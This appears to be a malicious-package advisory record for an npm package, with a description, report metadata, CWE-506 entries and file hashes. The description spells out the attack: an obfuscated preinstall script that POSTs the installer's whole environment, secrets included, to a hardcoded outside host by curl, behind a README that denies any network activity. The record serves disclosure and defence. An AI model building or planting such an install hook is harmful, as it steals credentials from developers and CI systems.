-= Per source details. Do not edit below this line.=-
package.json declares a preinstall lifecycle script sh./test.sh. test.sh assembles a curl -d "$(env)" https://abbishal.com/sh/installation-success command by splitting the tokens curl, env, and -d across single-character shell variables (i=c, s=u, a=rl, t=en) and reconstructing them via variable concatenation and command substitution. On npm install this POSTs the entire output of env — the installer shell/CI's full process environment, including any exported secrets such as CI tokens, cloud credentials (AWS_*, GCP, Azure), and npm publish tokens — to a hardcoded third-party host. The README asserts that the package performs no network requests, no filesystem access, no data collection, and has no preinstall/postinstall lifecycle scripts, directly contradicting the shipped manifest and script. The variable-fragment obfuscation and the cover-story README indicate deliberate evasion rather than a legitimate placeholder or canary.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-021106",
"import_time": "2026-10-08T03:50:28.268520535Z",
"modified_time": "2026-10-08T03:36:44Z",
"sha256": "484b402674ecbe568cbba8f2ceea75416fe46fc6ab549ae19594915eccbbfbe8",
"source": "amazon-inspector",
"versions": [
"1.3.1"
]
},
{
"id": "IN-MAL-2026-021105",
"import_time": "2026-10-08T03:50:28.211914676Z",
"modified_time": "2026-10-08T03:36:37Z",
"sha256": "bc0e1fb6fb8f481baf7c16b593aa342b3b63165f9e97e395ff49c4bed18dfa53",
"source": "amazon-inspector",
"versions": [
"1.3.0"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "test.sh",
"sha256": "3d01b172ee5cba35a504d85d771561cc3bcf125a8cf21e2c5b4619c1d4ca521a",
"tlsh": "acd07ddb0160e1f8efd2096f4b8212607aa4a0843912109c52da025b0201090754fc51"
}
],
"package_integrity": [
{
"filename": "abbishal-poc-as-dependency-1.3.1.tgz",
"hashes": {
"sha1": "8e04f735a8a7f93e3fc64369321aa4d459715828",
"sha512_sri": "sha512-1ZaGyUWN1fI08yuTnUUNYoOp5zrkfTig8HMyxqrJoDiWC3MoKU9dd/6RJtWzGKw1wGwsoGrwyqnHkaQnIGppjw=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/abbishal-poc-as-dependency/MAL-2026-17653.json"